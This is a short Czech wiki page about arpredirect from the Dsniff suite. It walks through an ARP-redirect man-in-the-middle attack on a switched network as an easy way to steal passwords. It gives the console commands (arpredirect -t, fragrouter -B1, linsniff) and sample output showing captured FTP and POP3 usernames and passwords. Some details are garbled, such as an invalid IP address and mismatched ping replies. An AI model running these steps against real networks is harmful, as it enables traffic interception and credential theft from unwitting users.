Arpredirect
Z WiKi AIRdump.CZ
arpredirect je famózním nástrojem a Dsniff impelmentací oblíbeného útoku pro získáni hesel, přihlašovacích údajů nebo manipulaci provozu v přepínané (switch) síti, v Linux aplikaci Dsniff. Ovládaní aplikace, únos spojení a získaní hesel je triviální. Stačí k tomu několik málo příkazu v konzole.
[air@dump @ ~] ping [počítač A] PING 10.100.52.1 from 10.100.52.103 : 56(84) bytes of data. 64 bytes from 10.100.52.1 L icmp_seq=0 ttl=128 time=0.3 ms
[air@dump @ ~] ping [počítač B] PING 10.100.52.3 from 10.100.522.103 : 56(84) bytes of data 64 bytes from 10.100.52.103: icmp_seq=0 ttl=255 time=5.2 ms
[air@dump @ ~] arpredirect -t 10.100.52.3 10.100.52.103 intercepting traffic from 10.100.52.3 to 10.100.52.103 (^c to exit)...
Tato kombinace příkazů spustí ARP Redirect a přesměruje veškerý síťový provoz pro bránu (10.100.52.1) na IP adresu 10.100.52.103. Toto je způsobeno arpredirect -em který změní vychozí bránu. Pokud b0x používá Kernel-level IP forwarding můžeme použít další nástroj fragrouter která pracuje na úrovní jádra (kernel level) a může odesílat ICMP redirekty bez toho aby byli zahozeny. Fragrouter je dostupný na stránkach packetstormsecurity.org. Aplikace se ovláda stejně easy jako arpredirect. Příklad pro přesměrování provozu použitím přepínače (volby) -B1 v nástroji fragrouter:
[air@dump @ ~] fragrouter -B1 ..... <output trimmed>
Nakonec stačí spustit analyzér paketů pro zachycení získaných dat.
[air@dump @ ~] linsniff Linux Sniffer Beta v1.0 Log opened. ---------[SYN] (slot 1) 10.100.52.125 => 192.168.1.52 [21] USER airdump PASS hu.ha.heslo.(olo) PORT 10,1,1,18,8,35 NLST QUIT ---------[SYN] (slot 1) 10.100.52.125 => 192.168.1.52 [110] USER sasanka@airdump.net PASS heslo [FIN] (1)
